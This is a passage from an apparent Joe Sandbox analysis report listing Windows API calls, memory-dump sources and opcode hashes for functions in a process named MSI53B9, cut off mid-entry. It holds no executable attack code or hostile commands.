                                              • GetFileAttributesW.KERNELBASE(?,?,?,00879E08,?,008775A0,?,?,?,?), ref: 00879E24
                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00879E08,?,008775A0,?,?,?,?), ref: 00879E50
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 178dbb5a7c5c8998e0e4c25a0aee2225d57e8c8cc2650b0d68dcb515ac2f83e4
                                              • Instruction ID: de42d794e139a3d8c51ee4b2f4b6b40c59bb0f273ca9d467df0b4dcd39cc2b80
                                              • Opcode Fuzzy Hash: 178dbb5a7c5c8998e0e4c25a0aee2225d57e8c8cc2650b0d68dcb515ac2f83e4
                                              • Instruction Fuzzy Hash: 10E06D325002686BDB10EA68DC05BDA7759FB097A2F0482A1FE88E3294D6709D888BD0
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0087F324
                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087DEC8,Crypt32.dll,?,0087DF4A,?,0087DF2E,?,?,?,?), ref: 0087F346
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: DirectoryLibraryLoadSystem
                                              • String ID:
                                              • API String ID: 1175261203-0
                                              • Opcode ID: f6d35b0a50a59b11ec73ecc9f7ab88a55a53f350c867a84af66f7d795f66c71f
                                              • Instruction ID: 833477c3e5e8b5ee7a520ae725ed22714b40117b4d4c849c443406850a520f15
                                              • Opcode Fuzzy Hash: f6d35b0a50a59b11ec73ecc9f7ab88a55a53f350c867a84af66f7d795f66c71f
                                              • Instruction Fuzzy Hash: 7EE012728111186BDB11AAA4DC05FEB776CFB093C1F0440A5B948D3105DA74D940CBB1
                                              APIs
                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00888945
                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0088894C
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: BitmapCreateFromGdipStream
                                              • String ID:
                                              • API String ID: 1918208029-0
                                              • Opcode ID: 95f3e3472ce487bca1444d1d36a3ddba2ec190df2fd0ee4ef00cb9049e497dee
                                              • Instruction ID: f084f5dc7c2e0a19995424621a3ad358d789cd66ebe6d3c33d4e7e7970c61461
                                              • Opcode Fuzzy Hash: 95f3e3472ce487bca1444d1d36a3ddba2ec190df2fd0ee4ef00cb9049e497dee
                                              • Instruction Fuzzy Hash: 2AE06D75800208EFCB50FF88C8017A9BBE8FB08321F10806AE845D3700E770AE049BA2
                                              APIs
                                              • GdiplusShutdown.GDIPLUS(?,?,?,0089F79B,000000FF), ref: 008890C7
                                              • OleUninitialize.OLE32(?,?,?,0089F79B,000000FF), ref: 008890CC
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: GdiplusShutdownUninitialize
                                              • String ID:
                                              • API String ID: 3856339756-0
                                              • Opcode ID: 36f0f0833907d68061e641382d37be47e56e1250f3ac239e134d8606e82fb664
                                              • Instruction ID: 59f0c17c472baec98d0d09b12e7d0dbfee3101d8321cf501c694a0785588fb10
                                              • Opcode Fuzzy Hash: 36f0f0833907d68061e641382d37be47e56e1250f3ac239e134d8606e82fb664
                                              • Instruction Fuzzy Hash: 56E01A32548A44AFC714EB8CDD45B45BBE9FB09B20F008769B92AC3B60CB396840CB91
                                              APIs
                                                • Part of subcall function 00891D9A: try_get_function.LIBVCRUNTIME ref: 00891DAF
                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00890CC4
                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00890CCF
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                              • String ID:
                                              • API String ID: 806969131-0
                                              • Opcode ID: b667425466d4e30dcf95b971a108ee069aa27d55a67d80b262318bef4a035207
                                              • Instruction ID: 82876f2f51a93f7ea9911c9957f775db6693332f546093e7e6d46b8804cc2cb9
                                              • Opcode Fuzzy Hash: b667425466d4e30dcf95b971a108ee069aa27d55a67d80b262318bef4a035207
                                              • Instruction Fuzzy Hash: 89D0A72554C30A2C2E143378281246A2344F742BBC7680346E032D5AC1EB1481419913
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: ItemShowWindow
                                              • String ID:
                                              • API String ID: 3351165006-0
                                              • Opcode ID: b47e00942b9ebb1024b65f5144f7fd068793714165360800a6b241846da30f0a
                                              • Instruction ID: 97bac4796dc53a0df8d1463fcb050f0cb685d408516c445a1ced5bc8c764489c
                                              • Opcode Fuzzy Hash: b47e00942b9ebb1024b65f5144f7fd068793714165360800a6b241846da30f0a
                                              • Instruction Fuzzy Hash: E2C01232058100BFDB010B70DC09C2EBBA9AB96621F00C904B4A5C0460C338C010DB22
                                              APIs
                                              • EnterCriticalSection.KERNEL32(008B1E74,?,?,?,?,0087A5A0,?,?,?,?,0089F79B,000000FF), ref: 0087FC42
                                              • LeaveCriticalSection.KERNEL32(008B1E74,?,?,?,?,0087A5A0,?,?,?,?,0089F79B,000000FF), ref: 0087FC99
                                                • Part of subcall function 0087F9D1: ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 0087FA05
                                                • Part of subcall function 0087F9D1: CloseHandle.KERNEL32(?,?), ref: 0087FA1F
                                                • Part of subcall function 0087F9D1: DeleteCriticalSection.KERNEL32(?), ref: 0087FA38
                                                • Part of subcall function 0087F9D1: FindCloseChangeNotification.KERNELBASE(?), ref: 0087FA44
                                                • Part of subcall function 0087F9D1: CloseHandle.KERNEL32(?), ref: 0087FA50
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: CloseCriticalSection$Handle$ChangeDeleteEnterFindLeaveNotificationReleaseSemaphore
                                              • String ID:
                                              • API String ID: 2851692498-0
                                              • Opcode ID: 8c99e87c0ec6a3786d497367be2956edae8cfbd5e1aa3ffcf4493f0a974982bb
                                              • Instruction ID: a6aa2d9856861d978fc3a195d121dd53dcb737d9bff8d1df31555cd89c09c8ac
                                              • Opcode Fuzzy Hash: 8c99e87c0ec6a3786d497367be2956edae8cfbd5e1aa3ffcf4493f0a974982bb
                                              • Instruction Fuzzy Hash: 83F0CD331041245BDA126726EC8457E771CF7C57643558226FF08EB14BDB35EC0187A1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: de294797e349cc1dd044812fcf4fb160f47586452ffd66d93e68bb495b84f8b3
                                              • Instruction ID: 9352174c1c08aaf3186afa23581280bbf347d7bd44973f867ea3e8269f64482d
                                              • Opcode Fuzzy Hash: de294797e349cc1dd044812fcf4fb160f47586452ffd66d93e68bb495b84f8b3
                                              • Instruction Fuzzy Hash: 24B1D070A00646AEEF29CF7CC489AB9FBA6FF05304F14825AD469D3685C731D964CB91
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00878210
                                                • Part of subcall function 0087137E: __EH_prolog.LIBCMT ref: 00871383
                                                • Part of subcall function 0087137E: new.LIBCMT ref: 008713FB
                                                • Part of subcall function 008719B1: __EH_prolog.LIBCMT ref: 008719B6
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: 039427ed5ad34e2913c23f0ad8b0c4be5fb7aab7e9ab685ef48bcb7fce5c7138
                                              • Instruction ID: 74c12e3bc2fcdbd650a118eab85dc7f98667defcf7f57cee9faf4e480f8ba849
                                              • Opcode Fuzzy Hash: 039427ed5ad34e2913c23f0ad8b0c4be5fb7aab7e9ab685ef48bcb7fce5c7138
                                              • Instruction Fuzzy Hash: 7041D3319406589ADF20EB68CC59BEA7369FF50300F0480EAE58EE3157DE749EC8DB21
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: e2ebd36664e4b39b9d154f48c35a15a25e1121b8a78a8c995afa00f44b8595cb
                                              • Instruction ID: d7c18f3a41fecc5fe60daec1b2a038000c10a3582f395fd7fbbe6d6030670e5d
                                              • Opcode Fuzzy Hash: e2ebd36664e4b39b9d154f48c35a15a25e1121b8a78a8c995afa00f44b8595cb
                                              • Instruction Fuzzy Hash: 0021F6B1E40615AFDB14FFB8CC41A6BB7A8FB14314F00423AE505EB682E7709D00C7A9
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0088948A
                                                • Part of subcall function 0087137E: __EH_prolog.LIBCMT ref: 00871383
                                                • Part of subcall function 0087137E: new.LIBCMT ref: 008713FB
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: fd61407eaf39f08c46a78eb45ada961bc0c7b4fb59c9a85fef2e9fe9bab45cd9
                                              • Instruction ID: cdc12fb76d856685cffae1d437deaf34236309ca9e8b727b9213c5e39ce45c46
                                              • Opcode Fuzzy Hash: fd61407eaf39f08c46a78eb45ada961bc0c7b4fb59c9a85fef2e9fe9bab45cd9
                                              • Instruction Fuzzy Hash: E1217C76C04249AACF15EF98D9419FEB7B4FF19304F1444AAE809F7602D735AE05CB61
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: 8683f9b0fa33d89e09de2cbbb2c32bd9785543a64fdd72a3c885996f630b283b
                                              • Instruction ID: db7268eae18d7fea02b33ff47e63e51e85736cdee68082e4efee8f6c30556d60
                                              • Opcode Fuzzy Hash: 8683f9b0fa33d89e09de2cbbb2c32bd9785543a64fdd72a3c885996f630b283b
                                              • Instruction Fuzzy Hash: 67117073A40429ABCF12AAACDC959DEB736FF48740F448529F819E7219DA34CC1087A1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: e1220c964d6a9e984c38d5cf5bf3d6ae8b823d9078723ff86e88ba4a386f27f6
                                              • Instruction ID: d69cf9e9b6a2fca93753872c1fa168daa4ef0a69168c047c306cb97f5c6bc973
                                              • Opcode Fuzzy Hash: e1220c964d6a9e984c38d5cf5bf3d6ae8b823d9078723ff86e88ba4a386f27f6
                                              • Instruction Fuzzy Hash: 2EF049B5A001158FDB18EF6CD40996EBBF9FF88700B0145AEE815E3341DBB09D018BA1
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,008923AA,?,0000015D,?,?,?,?,00892F29,000000FF,00000000,?,?), ref: 00895A2E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: c09c96fc0c733d8c62ce324b094605b93f1343df84a25d37f2b93ee6b9b87aa0
                                              • Instruction ID: b05a930544069666b17959bc316c34da38b266125b77168899f5e0d93700c443
                                              • Opcode Fuzzy Hash: c09c96fc0c733d8c62ce324b094605b93f1343df84a25d37f2b93ee6b9b87aa0
                                              • Instruction Fuzzy Hash: 70E06531501E745AEF333B659C46B5A36C8FF513A9F1D0324BC16D6190DB31CC0147A9
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00875B3A
                                                • Part of subcall function 0087AC66: __EH_prolog.LIBCMT ref: 0087AC6B
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: 209f53b682f64e29ae5a19615e31b0acf66045fc0681599cec4bac1c48b782b3
                                              • Instruction ID: b46127160b6b594f7462c24d1e4acc81d83302d3d4aa8920d1b11d65f5359ac0
                                              • Opcode Fuzzy Hash: 209f53b682f64e29ae5a19615e31b0acf66045fc0681599cec4bac1c48b782b3
                                              • Instruction Fuzzy Hash: FC018B30900684DACB06E7A8C0153EDBBE4EF56304F40C0ADA95D93282CBB46B08A763
                                              APIs
                                              • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00879473), ref: 008794BE
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: ChangeCloseFindNotification
                                              • String ID:
                                              • API String ID: 2591292051-0
                                              • Opcode ID: b04c36e2544f92a8b42f269382fc3c95650c7a48e9d901d01bf188781ba5ccdb
                                              • Instruction ID: b2f77f05bb1acf0dfa511571dfea2069e4bdbe2aef0426e592e83f108770fdc5
                                              • Opcode Fuzzy Hash: b04c36e2544f92a8b42f269382fc3c95650c7a48e9d901d01bf188781ba5ccdb
                                              • Instruction Fuzzy Hash: DAF0B430142B044EDB308A24954879177E8FB12732F04C71ED0EA838E4D361E44A8B11
                                              APIs
                                              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0087A174
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: CloseFind
                                              • String ID:
                                              • API String ID: 1863332320-0
                                              • Opcode ID: cfa833ce9ecfabbda8357ba62ce96d90b5dba3a59f598c3d0cc81cf178d9edd4
                                              • Instruction ID: 10bf4c8d6540b2c2d13ec057144660eab9cf8a371a2570416ef9fc14b2917035
                                              • Opcode Fuzzy Hash: cfa833ce9ecfabbda8357ba62ce96d90b5dba3a59f598c3d0cc81cf178d9edd4
                                              • Instruction Fuzzy Hash: 4DF0B431408780EADA229BB88404BCB7B95BF46331F04CA49F1FE82196C27590859733
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00871E93
                                                • Part of subcall function 008718F6: __EH_prolog.LIBCMT ref: 008718FB
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: bbbb5c938c144e52c708cb0746c022d239834102951e288c90881c55e7683ca3
                                              • Instruction ID: 67cfa418f0f22420e7c7861a791cbbbd8e8e68c5039884c65cd5406c278a0c34
                                              • Opcode Fuzzy Hash: bbbb5c938c144e52c708cb0746c022d239834102951e288c90881c55e7683ca3
                                              • Instruction Fuzzy Hash: 2BF0D4B1D102898ECF40EFAC84096EEBBB4FB18300F0441BAD509E7602E73486048BA2
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00871E93
                                                • Part of subcall function 008718F6: __EH_prolog.LIBCMT ref: 008718FB
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: e0ae847181b1538d67acaf3b877b1e0c0f52bda45648bd320df295aee16f3314
                                              • Instruction ID: 0525880fc22c7767646180ccbff0b54629550b41149092dcf17bf8fd980b6156
                                              • Opcode Fuzzy Hash: e0ae847181b1538d67acaf3b877b1e0c0f52bda45648bd320df295aee16f3314
                                              • Instruction Fuzzy Hash: F8F098B1C112598ECF41EFACC4496EEBBF5FB18300F1441BAD409E7606E7359604CB91
                                              APIs
                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 0087F927
                                              Memory Dump Source
